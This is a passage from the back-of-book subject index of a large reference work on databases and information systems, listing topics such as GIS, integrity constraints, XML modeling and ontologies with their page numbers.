Geotechnical, Rock and Water Resources Library 380 geovisualization 786 GISs (geographical information systems) 395, 778, 779, 780, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 795, 796, 1015, 1445, 1570, 1682, 1691, 1741, 1754, 2685 GISs (graphical information systems ) 210 GIS applications 395 GIS knowledge infrastructure, environmental 778 GIS-based interactive database system 1741 global constraint checking 566 global database system (GDBS) 1258 GEODE (Global Education Online Depository and Exchange) 381 Global Grid Forum 1268 global manufacturing 338 global positioning system (GPS) 210, 780, 1570, 1755 global rollback 862 global schema 2053 global semantic integrity constraints 550 global-as-view (GAV) 2474 globalized technology society 1823 GNU 2386 goal-oriented requirement engineering 570 Google Earth 395, 397 Google Earth, main layout 398 Google Earth, sample queries 397–400 Google Earth, user solution 397 Google hacking attack 2127 Google Scholar 1410–1411 government 1685, 1829–1843 government agencies 1723 government portal 2109 government, as consumer 1686 government, as regulator 1685 grammar, context-free 728 grammar, context-free phrasestructure 743
I IBM (International Business Machines) 206 Iconex 381 ICTs, international 1876, 1877 IDEAS (Interactive Dialogue with Educators from Across the State) 381 IDEF1X 344 identifiability 1672, 1681 identity concept 4 identity theft 1519, 1525, 1822 IDS (integrated data store) 206 IDS, overview of 384 IEEE Learning Technology Standards Committee (LTSC) 364 illegal immigration 1524–1525 iLumina 381 image analysis 62 image archive module 1387 image databases 2275 image mining 1552 image representation 1198, 2277 image retrieval 61, 68, 73, 81, 1189, 1191, 1195, 1202 image retrieval problem 2279 image retrieval, content-based (CBIR) 179 image segmentation 1198 images 1193 imprecision 341, 1024, 1025, 1032 IMS (information management system) 206 IMS Global Learning Consortium Inc. 370, 372–373 inclusion 968 inconsistency 2052 inconsistency tolerance 220
inconsistent database 2058 incremental development cycle 1290 indexed attribute 2293, 2300 indexer 938 indexing, temporal 402 indices, dynamic 198 indices, static 198 indigenous knowledge systems 1468 indigenous peoples 1462 individual autonomy 1823 induction algorithm 394 information access 1733, 1823 information compression 748 information extraction (IE) 932, 2130, 2131 information gain (IG) 2641 information grid 1934 information interpretation system 1571, 1572, 1578 information justice 1823 information modeling 2, 339 information modeling, philosophical foundations of 1–12 information organization (IO) 1824–1843 information privacy 1823 information processing 1638, 1640, 1643, 1646, 1647 information retrieval 196, 726, 1731 information security defense curves 1523 information sharing 1723 information space, dynamic organization 907 information storage 1730 information systems 338, 1664 information, imperfect 106 information, imprecise and uncertain 105 information-exchange dilemma 1681 infrastructure grid 1934 initialization 446 inner product 1093, 1094, 1095, 1097, 1099, 1100 insider countermeasures 2082 insider threats 2115 instance 394, 1193 instance-level methods 290
institutional review board (IRB) 1837–1843 instructional technology 1867 integrated care records 2095 integrating databases 2473 integration 866, 871, 2052 integration efforts 274 integration strategy 2482 integration-mechanism architecture 2483 integrity 220, 2108 integrity checking 220 integrity checking, simplified incremental 213 integrity constraints 212, 220, 2053, 2058 integrity constraints, declarative 219 integrity constraints, dynamic 220 integrity constraints, procedural 219 integrity constraints, static 220 integrity enforcement 220 integrity satisfaction 220 integrity theory 213 integrity violation 220 intelligence for engineering 341 intelligent discovery assistant 656 interactive data access environment 1576 interactive digital archive 1463 interactive navigation 1159 interactive television (iTV) 1479 inter-dimension constraints 968 interface design 1464 internal consistency 1024 internal privacy review board 1837–1843 International Software Benchmarking Standards Group (ISBSG) 2001, 2005, 2008 international standardization organization (ISO) 1383 Internet 485, 1468 Internet applications 1437, 1445 Internet applications, databases for 1420 Internet control message protocol (ICMP) 2116 Internet protocol television (IPTV) 1477, 1477–1486 Internet-based applications 1915
inter-ontology relationships 910 interpretation system 1568 intersymbol interference (ISI) 1085 interview-based qualitative data 1876 intra-dimension constraints 968 intrinsic IQ criteria 2145 intrusion detection intrusion detection system (IDS) 394 intuitionistic sets 1128, 1136, 1146, 1148 inverse frequent itemset mining 2274 inverted files 197 inverted index 938 invertibility 2230–2231 investment errors 1788 investment portfolios, allocating patterns 2657 investment-item return prediction 2658 investment-item selection 2658 investment-item weight determination 2658 IP security (IPsec) 2084 IPRs (inconsistent pair-wise relations) 2690 IPRs, balanced 2694 IPRs, elasticity analysis of 2691 IPRs, examples of 2690 IPRs, graphical representation of 2690 IPRs, unbalanced 2693 iRevive 1347 iRevive system architecture 1348 Irrunytju (Wingellina WA) 1464 IS (information systems) 615, 866 IS capabilities 866, 868, 869 islands of applications 1935 islands of computing 1935 ISO (International Organization for Standardization) 344 isolation 1024 IS-UML class diagrams 1173 IS-UML diagrams 1173 IT (information technology) 62, 1682, 1756 IT applications in practice 1694 IT best practices 1462 IT business value (ITBV) 866, 869
IT investments 866 IT payoff paradox 866 IT standards 1529 IT&T infrastructure 1468 IT/economic development revolutions 1687 IU (Interactive University) Project 381
multivariate Gaussian 2019 multivariate linear regression (MLR) 2001 multiversion concurrency control (MVCC) 841 music data mining 35 music information retrieval (MIR) 38 musical analysis 35 Mutitjulu (Uluru NT) 1464 mutual exclusion metrics 2197– 2199 MXQuery 2473, 2476 MXQuery, usage 2480 myGrid 1269 MySQL 17, 207
N naïve Bayes classification 1403 NAME(n) function 2480 namespaces 1320 n-ary relationships 2493, 2506 NASA (National Aeronautics and Space Administration) 206 national health service (NHS connecting for health) 2086, 2087 national ID card 1526 national identification number (NINo) 2088 National Learning Network: Materials 382 national security 1513, 1521 National Security Agency of the Slovak Republic 2110 national security letters (NSL) 1521–1522 natural language front ends 747 natural language syntax 747 natural language, analysis and production of 726 natural language, analysis of 726 near real time (NRT) 849 nearest neighbour (NN) 51 NEEDS 382 negative elasticity 2692 negotiation 1025, 1032, 1033, 1034 neighboring objects 2687 NEON (National Ecological Observatory Network) 779 Nepabunna 1464
Nest 978 nesting 1975 NetCube 2012, 2021, 2031 network availability levels (5Nines) 1900 network level threats 2111 network model 208, 1460 networkable database 1309 network-level countermeasures 2080 networks 726, 728 Ngaanyatjarra Council 1464 NIME (National Institute of Multimedia Education) 372 Niri-Niri 1468, 1469 NISO (National Information Standards Organization) 487 NIST Model 2103, 2107 NIST Model of RBAC 2103 NMC (New Media Consortium) 364 NNs (neural networks) 1189, 1191, 1194, 1198, 1199, 1200 NNs, computing 2168 NNs, classification 1403 NNs, feed-forward 1194, 1199 node swapping 2212 nominal attributes 2004 nominal attributes, transformation of 2004 non-collaborative servers 1108, 1109, 1110, 1111, 1112, 1113, 1115, 1116, 1118, 1122, 1123 non-monotonic reasoning paradigm 2261 nonstandard/complex transformation 849 normalization 209, 211, 2065, 2066 normalized work effort 2002, 2006 Northern Territory Library and Information Service 1464 NSDL (National Science, Mathematics, Engineering, and Technology Education Digital Library) 382 NULL 2480 Nyquist-Shannon sampling theorem 2568, 2570 NYSIIS 1801
database 2666 one-to-many relationships 208 online assessment, types of 1292 online assessments, electronic tools for 1291 online assessments, evaluation of 1293 online asynchronous collaborative discussion environment 1576 online communities 1576 online data 1839, 1839–1843 online decision support systems (ODSS) 829 online transactional processing 2100 on-mobile location-dependent information processin 1255 onomastics 1802 ontologies 1453, 2348, 2410, 2448, 2449, 2450, 2451, 2452, 2453, 2454, 2455, 2456, 2457, 2458, 2459, 2460, 2462, 2464, 2465, 2466, 2467, 2468, 2469, 2470, 2471 ontology management systems 2452 OO (object-oriented) conceptual model 573 OO database 487 OO model 442, 726 open source code forges 2301 open source databases (OSDBs) 887, 893 open word assumption (OWA) 265, 2377 openURL 1406–1407 OpenVES 382 operating systems (OSs) 1501, 1508, 1904 operation and maintenance (O&M) 862 operational linkages 874 opportunistic data structures 199 optimistic combination 2285 optimization 214 optional arc 93 optional sources 2485 optomistic and combinations 2286 Oracle 206, 349 Oracle database grid 1930
Oracle grid 1669 Oracle grid control 1931 Oracle text 935 organizational decision support 1604 organizational learning 1638, 1640, 1644, 1649 organizational model 99 OSS (open source software) 887 OSS development teams 797 outcomes-based curriculum 1313 outer product 1085, 1093, 1094, 1095, 1097, 1102 outlier 394 outlier detection 394 outsourced database service (ODBS) 2204, 2205–2207, 2208, 2209, 2213, 2215, 2216, 2219 ownership proof 2224, 2230, 2234, 2241
P PALS (Publishers and Librarian Solutions) 323 parallel join 660 parallelism 847, 854 parameterized views 1666 parameters 965 parsing 745 partial elasticity 2693 partial global serialization graph (PGSG) 1260 participation 2493, 2502 participation relationships 2506 partition and replicate strategy (PRS) 662, 666 partitioned replicas (PRs) 674 partitioning 660, 851, 968 partitioning method 441 partitioning strategies 666 patient information system, wireless integration of 1357 patient record number (PRN) 1387, 1388, 1389, 1390 patrilineal genealogy 958 pattern recognition 726 PBS TeacherSource 382 PDAs (personal digital assistants) 1310 PDAs, interfaces and connectivity 1365
Peppimenarti 1464 performance comparison 1200 performance evaluation 1226 performance measurement metric 1200 performance measurement tools 1226 performance metrics 1025, 1033, 1233 performance requirements 1447 PERINORM database 1529 periodic data 225 periodicity 1035 personal data 2088 perturbation approaches 2270 perturbation-based techniques 2105 perturbed database 2274 Petri net 1026 PFRD-H (hash-partition fact and replicate dimensions strategy) 667 phishing 1822 Phpmyadmin 820 physical algebra 2510, 2518 physical countermeasures 2082 physical design alternatives 834 physical model 1010 pipelining 847, 854 Pitjantjatjara 1462 Pitjantjatjara Land Rights Act 1981 1462 planned disconnection mode 1263 pods sensor networks 1571 point-in-time recovery (PiTR) 21 policy 1472 policy function 1664 politics 1802 polytrees 2019 Port Augusta 1464 portable document format (PDF) 1383 portfolio management 2657 portfolio selection 2658 position weight matrices (PWM) 2633 positioning aggregation 1245 possibilistic approach 145 possibilistic model 148 possibility distribution 107, 138 post-deployment IT changes 1756, 1773
PostgreSQL database 1572, 1574 post-join 1256 post-pruning 2004 PoTree 404 precision 1734 pre-conditioned substitution 443 Pred(%) 2007, 2008 predicate 1669 predicate logic 261 prediction at level l 2005 prehospital database system 1344 prehospital patient care records (PCRs) 1345, 1348 pre-join 1256 prepare phase 1989 pre-serialization transaction management model 1260 previous knowledge 836 primary artifacts 896 primary-key criticality 2225, 2229 prime factor encoding algorithm 2330 prime factor encoding scheme 2328 prime factor scheme 2328 prime index tree 2330 principle of irrelevance of syntax 2267 printed circuit board 1085, 1086, 1087, 1088, 1090 privacy conscious entities (PCEs) 2131 privacy legislation in the European Union 1831–1843 privacy preserving data mining 2268, 2274 probabilistic inference 2023 probabilistic reasoning 726 probabilistic relational models 2016 probabilistic weight matrix 2634 probability 728 probability distribution function (PDF) 2015 problem solving environments 1453 problem transformation (PT) methods 316 processes, coordination in 802 product characteristics 2005 product data management (PDM) system 340
product life cycle 339 production management 342 production of natural language 726 productivity 2002 prohibition of compilation 2094 project context 2005 project database 2000 project size data 2005 projection 1246 projects, expansion of 943 pro-motion model 1261 PROOVE environment 1013 proper interpretation of the results 2002 propositional logic 261 protein databases 2632 protein sequence motifs 2632 proteins 2632 PROTEUS 1270 protocol 1383, 1461 provisioning 1934 public watermarking 2228–2229 purchase order application 528 pure bending tester 2191 pure containment query 2069
stemmers 939 STEP (Standard for the Exchange of Product Model Data) 344 stereoscopic display 1159 stock measures 97 storage concepts 2348 storage concepts, evaluation of 2353 storing personal digital information 2353 storing topic maps 2352 strict time constraints 849 string metrics 2307 structural motifs 2648, 2649 structural patterns 2060 structure index 2062, 2065, 2066, 2067, 2068, 2069 structure, mediating 873 structure-centric approach 2350, 2355 structured database schema 441 structured database schema, specialized class-machine 441 student information system 1290 subject categories (SCs) 495 subjective norms 1874 substitution refinement 1180 substitution transitions 1026 sui generis summary care records (SCR) 2095 summary work effort 2006 summary-schemas hierarchy 490 summary-schemas model (SSM) 486, 488 SUMO 2386 supervised learning 1191 support vector machine (SVM) 1193 SUSHI (Standardized Usage Statistics Harvesting Initiative) 325–326 sustainable development 778, 785, 788, 792, 795 symbolic data analysis 656 symbolic object warehouse 649 symbolic object warehouse, architecture for 648 symbols constraint 2636 symmetric multiprocessor (SMP) 21, 1917 synchronous communication 1681
synopsis data structures 166 syntax 2484 synthetic benchmark, definition 1233 SysML 1879, 1889, 1897 system architecture 2111, 2288 system design expansion 1769 system enhancement 1770 system hardware 1365 system identification 2567, 2569, 2570 system maintenance, ease of 1735 system performance analysis 1368 system stability 2570
T tabular data 1839, 1839–1843 TAE database, transactions for 2561 tag clouds 1416 teacher education 1291 teaching transparently 1294 technological colonisation 1470 technology acceptance model (TAM) 1868, 1874 technology implementation barriers 1359 technology of usability engineering 1578 telecommunication 1529 telemedicine 485 teleology 5 temporal data, querying 232 temporal pi-patterns 1210 temporal queries 998 temporal relational database instance 1207 temporal restrictions 1021 temporal visual query environment (TVQE) 990 temporary component 2521 Teradata 206 tertiary structure 2649 test collections, OHSUMED (Oregon Health Science University’s MEDLINE) 499–504 text categorization (TC) 933 text mining 932, 2130 text sanitization 2133 text summarization 933 textual language 980
texture 1198 theoretic-information measures 2640 theory of meaning 283, 284, 285, 291, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302 thesauri 939 thesauri, MEDTHES (medical thesaurus) 486, 492, 494, 495, 499, 500, 502 thesauri, MeSH (medical subject headings) 486, 487, 492, 493, 494, 499, 502 thesaurus maintenance 492 thesaurus structure 492 Thiessen polygons 1574 threats 2111 three dimensional (3-D) virtual world, environment capabilities 2606 three dimensional (3-D) virtual worlds in education 2595 three dimensional (3-D) virtual worlds, educational opportunities 2606 three-tier architecture 893 tight coupling 784, 785 time performance 2556 timestamp 1023, 1032 timing constraint 1023, 1027, 1028 timing diagram (TD) 1030 Tinley Park Economic Development 1695 TKPROF 682, 700 topology 1461 total information awareness system (TIA) 1520 TOVE measurement ontology 2387, 2392, 2396 transaction locator 1053 transaction model 833 Transaction Processing Performance Council (TPC) 1226 transaction properties 1023 transaction routing 837 transaction routing, affinity-based 837 transactional integrity 1916 transformation 847 transient data 225
transparent access to multiple bioinformatics information sources (TAMBIS) 487 transport layer security (TLS) 2084 TREC 500 TREC9 499 tree like models, XML Authority 544, 545 tree-based strategy 2313 tree-indexed data 2204–2222 tree-like models 544 trees 728 tree-shaped structures 941 trial system implementation 1366 trial system testing 1366 trial system, design considerations for 1360 triangulation 1882 trigger 220 truth table 736 truth, correspondence vs. coherence views 7 tuple combination 2285 tuple comparison 2284 tuple relational calculus (TRC) 137 tuple-based approach 2054 twikis 1414 two-phase commit protocol (2PC) 34 two-phase-commit (2PC) 833 type definition 731
W W3C (World Wide Web Consortium) 210 War on Terror, The 1514–1515 warranted practices 1292 watermark 2223–2244 waveguides 1084, 1085, 1087, 1088, 1089, 1090, 1101, 1102, 1103, 1104 wavelet data compression scheme 2327
wavelet decoding 2327 wavelet reconstruction process 2328 wavelet transform array (WTA) 2327 wavelets 2050 WBP with bitmap join indexes (WBP+JB) 668 weak attributes 965 weak irrelevance of syntax (WIS) 2264, 2267 weather data distribution map 1571 weather data spatial distribution 1571 Web application 2111 Web application (Webapp) 893 Web application development platforms, .NET 529 Web application development platforms, J2EE 529 Web hacking 2123 Web ontology language (OWL) 2360, 2361, 2362, 2363, 2366, 2367, 2368, 2369, 2370, 2371, 2375, 2376, 2377, 2378, 2379, 2380, 2381, 2382, 2383, 2452, 2454, 2455, 2456, 2458, 2459, 2460, 2461, 2462, 2463, 2464, 2465, 2466, 2467, 2469, 2470, 2471 Web page 2619 Web page as a database 2616 Web page, legal protection of 2616 Web pages, protection of 2625 Web portals 1270, 2079, 2081 Web portals, security threats 2109 Web powered databases 2118 Web reality 2473 Web server 2084, 2117 Web site design 1363 Web sites 1691 Web sites, evolution of 1683, 1691 WebAlliance 957 Web-based applications 340 WebCT 373 WebFINDIT 904 WebFINDIT architecture 916 WebFINDIT, design principles of 906
Web-powered databases, countermeasures 2079 Web-powered databases, legally sensitive 2110 Web-powered databases, security threats 2109 weighted association rule (WAR) 2657, 2682, 2683 weighted association rule mining (WARM) 2660, 2662 Weka 2001, 2002, 2007, 2008 Weka toolkit 2001, 2002 wide area network (WAN) 1455, 1468, 1912 wikis 1413–1414 window constraint 2636 Windows advanced server security 1366 Windows Live Academic 1410– 1411 wireless access client-server synchronization 1365 wireless communication 1257 wireless computing 1239 wireless technology 1255 WLS modeling question 1602 word-based indices 198 word-braker 939 WordNet 486, 488, 492, 493, 502 work effort 2001 workflow application 1756, 1762 workflow application project 1762 workflow management 856 workload 2570 workload generator 1924 workload model 1233 workload-based partitioning (WBP) 667 World Intellectual Property Organization (WIPO) 2618 World Wide Web (WWW) 363 World Wide Web Consortium (W3C) 529 worm attack 388 Wu and Palmer algorithm 494
X XAR-Miner in AR mining 523 XBD 1965 XConstraint Checker 556 XConstraint Checker architecture 556
XConstraint Decomposer 559 XDM (XML for data mining) 1320 XDM data items 1324 XDM database schema and state 1329 XDM statements 1326 XDM system, implementation of prototype 1331 XDS 1974 XDSQuery 1979 XDSSchema 1975 XDW requirement model 586 XER (extensible entity relationship model) 535 XGrammar 540 XLMiner 1396 XML (extensible markup language) 346, 487, 527, 570, 729 1014, 1321, 1959, 2473 XML benchmarks 1227 XML constraint representation 554 XML data 505, 2524 XML data extraction and transformation 509 XML data sources 1961 XML data, advantages of relational transformation 512 XML data, multi-relational databases of 510 XML databases 347 XML databases, multiple 550 XML designer 542 XML documents 210, 571, 2476, 2488, 2489, 2490, 2494 XML document warehouse (XDW) 570 XML document warehouse (XDW), architecture of 576 XML DTD 530 XML elements 2494 XML in Oracle 2353 XML interface 2484 XML metadata interchange (XMI) specification 529 XML modeling issues 531 XML query language 1732 XML schema 531, 1321, 2494 XML sources 596 XML sources, native 1962 XML transfer 2528
XML tree, indexed (IX-tree) 509 XML, conceptual modeling for 527 XML, constraint checking in 567 XML, constraints for 567 XML, data semantics in 2496 XML, entity relationship for (ERX) 534 XML, metadata representation with 530 XML, modeling issues in 530 XML-based database 1320